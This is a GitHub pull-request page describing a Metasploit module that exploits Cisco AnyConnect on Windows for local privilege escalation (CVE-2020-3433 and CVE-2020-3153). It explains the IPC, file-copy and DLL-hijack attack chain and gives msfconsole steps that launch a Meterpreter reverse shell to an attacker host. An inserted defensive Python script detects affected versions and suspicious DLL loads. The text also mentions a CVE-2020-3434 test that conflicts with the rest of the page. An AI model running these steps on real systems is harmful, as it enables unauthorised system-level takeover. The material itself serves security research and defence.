Added CVE-2020-3433 module #14187
Merged
To be clear, here it is working with both CVEs....
bwatters-r7 added a commit that referenced this pull request on Sep 29, 2020
Release Notes: Renamed the
Thanks @bwatters-r7!
Hi,
This PR changes modules/exploit/windows/local/anyconnect_path_traversal_lpe module that exploits CVE-2020-3153 (msf module by @cdelafuente-r7) to add the possibility to exploit another local privilege escalation that I found in Cisco AnyConnect for Windows: CVE-2020-3433.
By default, this module will exploit CVE-2020-3433 (more versions vulnerable) but you can set an option to exploit CVE-2020-3153 (if vulnerable).
Cisco's advisory: link
My PoC and technical details for CVE-2020-3433 (+ CVE-2020-3434 & CVE-2020-3435) are on my GitHub: link (in particular, you can check the Details.md file).
Antoine
Vulnerable Application
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.8.02042 is vulnerable to path traversal and allows local attackers
to create/overwrite files in arbitrary locations with system level privileges.
The installer component of Cisco AnyConnect Secure Mobility Client for Windows
prior to 4.9.00086 is vulnerable to DLL hijacking and allows local attackers
to execute code on the affected machine with system level privileges.
Both attacks consist in sending a specially crafted IPC request to the TCP
port 62522 on the loopback device, which is exposed by the Cisco AnyConnect
Secure Mobility Agent service. This service will then launch the vulnerable
installer component (vpndownloader), which copies itself to an arbitrary
location (CVE-2020-3153) or with a supplied DLL (CVE-2020-3433) before being
executed with system privileges. Since vpndownloader is also vulnerable to DLL
hijacking, a specially crafted DLL (dbghelp.dll) is created at the same location
vpndownloader will be copied to, in order to get code execution with system
privileges.
The CVE-2020-3153 exploit has been successfully tested against Cisco AnyConnect
Secure Mobility Client versions 4.5.04029, 4.5.05030 and 4.7.04056 on Windows 10
version 1909 (x64) and Windows 7 SP1 (x86); the CVE-2020-3434 exploit has been
successfully tested against Cisco AnyConnect Secure Mobility Client versions
4.5.02036, 4.6.03049, 4.7.04056, 4.8.01090 and 4.8.03052 on Windows 10 version
1909 (x64) and 4.7.4056 on Windows 7 SP1 (x64).
AnyConnect Secure Mobility Client is not publicly available and only customers
with active contracts can download it. For this reason, download links have not
been provided.
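A defender-side check for the two conditions described above (an installed version still inside the affected ranges, and vpndownloader.exe running from, or loading dbghelp.dll from, somewhere other than its install directory), as an added example that is not part of this PR or the Metasploit module. The install directory, the System32 path and the Sysmon-style image-load record layout are assumptions; the sample records are constructed.

```python
from pathlib import PureWindowsPath

# Fixed versions from the module documentation: CVE-2020-3153 fixed in 4.8.02042,
# CVE-2020-3433 fixed in 4.9.00086 (parts compared as ints, so 4.8.02042 == (4, 8, 2042)).
FIXED_IN = {"CVE-2020-3153": (4, 8, 2042), "CVE-2020-3433": (4, 9, 86)}

# Assumed paths (not taken from the page): the usual AnyConnect install directory
# and the Windows system directory where a legitimate dbghelp.dll lives.
ANYCONNECT_DIR = r"C:\Program Files (x86)\Cisco\Cisco AnyConnect Secure Mobility Client"
SYSTEM32 = r"C:\Windows\System32"


def affected_cves(version):
    """Return the CVEs from the documentation that still apply to a version string."""
    parsed = tuple(int(part) for part in version.strip().split("."))
    return [cve for cve, fixed in FIXED_IN.items() if parsed < fixed]


def _under(path, directory):
    """Case-insensitive 'path lies inside directory' test on Windows paths."""
    p, d = PureWindowsPath(path.lower()).parts, PureWindowsPath(directory.lower()).parts
    return p[: len(d)] == d


def suspicious_image_loads(events, install_dir=ANYCONNECT_DIR):
    """Flag vpndownloader.exe running from, or loading dbghelp.dll from, an unexpected place.
    `events` are Sysmon-style image-load records (Event ID 7) with Image/ImageLoaded keys."""
    findings = []
    for ev in events:
        image, loaded = ev["Image"], ev["ImageLoaded"]
        if PureWindowsPath(image).name.lower() != "vpndownloader.exe":
            continue
        reasons = []
        if not _under(image, install_dir):
            reasons.append("vpndownloader.exe executing outside the install directory")
        if (PureWindowsPath(loaded).name.lower() == "dbghelp.dll"
                and not _under(loaded, SYSTEM32) and not _under(loaded, install_dir)):
            reasons.append("dbghelp.dll loaded from an untrusted directory")
        if reasons:
            findings.append({"image": image, "loaded": loaded, "reasons": reasons})
    return findings


# Constructed sample records (not real telemetry): one benign load, one matching the
# copy-plus-DLL pattern described above, and one unrelated process.
SAMPLE_EVENTS = [
    {"Image": ANYCONNECT_DIR + r"\vpndownloader.exe", "ImageLoaded": SYSTEM32 + r"\dbghelp.dll"},
    {"Image": r"C:\Users\Public\drop\vpndownloader.exe", "ImageLoaded": r"C:\Users\Public\drop\dbghelp.dll"},
    {"Image": r"C:\Windows\notepad.exe", "ImageLoaded": SYSTEM32 + r"\dbghelp.dll"},
]

if __name__ == "__main__":
    print(affected_cves("4.8.03052"))  # ['CVE-2020-3433']
    print(suspicious_image_loads(SAMPLE_EVENTS))
```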
Verification Steps
use exploit/windows/local/anyconnect_lpe
set SESSION <SESSION>
set payload windows/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT <LPORT>
check
run
Options
INSTALL_PATH: Set the Cisco AnyConnect Secure Mobility Client installation path
(where vpndownloader.exe should be found). It will be automatically detected if
not set.
CVE: Set the CVE to use (CVE-2020-3153 or CVE-2020-3433). Default: CVE-2020-3433.
ForceExploit: Set this to true to override the check result during exploitation.